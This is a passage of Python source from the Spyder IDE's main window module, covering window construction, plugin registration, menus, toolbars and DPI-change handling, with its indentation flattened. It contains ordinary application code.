plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugins do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when pressing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Mapping of new plugin identifiers vs old attribute
# names given for plugins, or to prevent collisions with other
# attributes, i.e. layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# Tour
# TODO: Should be a plugin
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
# Get ordered list of plugins classes and instantiate them
plugin_deps = solve_plugin_dependencies(list(enabled_plugins.values()))
for plugin_class in plugin_deps:
plugin_name = plugin_class.NAME
# Non-migrated plugins
if plugin_name in [
Plugins.Editor,
Plugins.IPythonConsole,
Plugins.Projects]:
if plugin_name == Plugins.IPythonConsole:
plugin_instance = plugin_class(self)
plugin_instance.sig_exception_occurred.connect(
self.handle_exception)
else:
plugin_instance = plugin_class(self)
plugin_instance.register_plugin()
self.add_plugin(plugin_instance)
if plugin_name == Plugins.Projects:
self.project_path = plugin_instance.get_pythonpath(
at_start=True)
else:
self.preferences.register_plugin_preferences(
plugin_instance)
# Migrated or new plugins
elif plugin_name in [
Plugins.MainMenu,
Plugins.OnlineHelp,
Plugins.Toolbar,
Plugins.Preferences,
Plugins.Appearance,
Plugins.Run,
Plugins.Shortcuts,
Plugins.StatusBar,
Plugins.Completions,
Plugins.OutlineExplorer,
Plugins.Console,
Plugins.MainInterpreter,
Plugins.Breakpoints,
Plugins.History,
Plugins.Profiler,
Plugins.Explorer,
Plugins.Help,
Plugins.Plots,
Plugins.VariableExplorer,
Plugins.Application,
Plugins.Find,
Plugins.Pylint,
Plugins.WorkingDirectory,
Plugins.Layout]:
plugin_instance = plugin_class(self, configuration=CONF)
self.register_plugin(plugin_instance)
# TODO: Check thirdparty attribute usage
# For now append plugins to the thirdparty attribute as was
# being done
if plugin_name in [
Plugins.Breakpoints,
Plugins.Profiler,
Plugins.Pylint]:
self.thirdparty_plugins.append(plugin_instance)
# Load external_plugins adding their dependencies
elif (issubclass(plugin_class, SpyderPluginV2) and
plugin_class.NAME in external_plugins):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver to add
# plugins to the dependencies dialog
if not running_under_pytest():
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(
module, package_name, description, version, None,
kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ToolsMenuSections,
FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
self.consoles_menu = mainmenu.get_application_menu("consoles_menu")
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
self.projects_menu = mainmenu.get_application_menu("projects_menu")
self.projects_menu.aboutToShow.connect(self.valid_project)
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None] + self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
#----- Tours
# TODO: Move tours to a plugin structure
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Move to plugin
# IPython documentation
if self.help is not None:
self.ipython_menu = SpyderMenu(
parent=self,
title=_("IPython documentation"))
intro_action = create_action(
self,
_("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(
self,
_("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(
self,
_("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(
self.ipython_menu,
(intro_action, guiref_action, quickref_action))
mainmenu.add_item_to_application_menu(
self.ipython_menu,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.ExternalDocumentation,
before_section=HelpMenuSections.About)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g. self.console or self.main.console, preserving the
same accessors.
"""
# Mapping of new plugin identifiers vs old attribute
# names given for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_id, plugin_instance in self._PLUGINS.items():
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin, plugin_instance in self._PLUGINS.items():
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance, Plugins.Console)
if isinstance(plugin_instance, SpyderDockablePlugin):
plugin_instance.get_widget().toggle_view(False)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
# Activate HDPI auto-scaling option since it is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(_(
"A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > Application > "
"Interface</tt>, in case Spyder is not displayed "
"correctly.<br><br>"
"Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is a submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is a submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled(
readwrite_editor and widget.document().isUndoAvailable())
self.redo_action.setEnabled(
readwrite_editor and widget.document().isRedoAvailable())
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
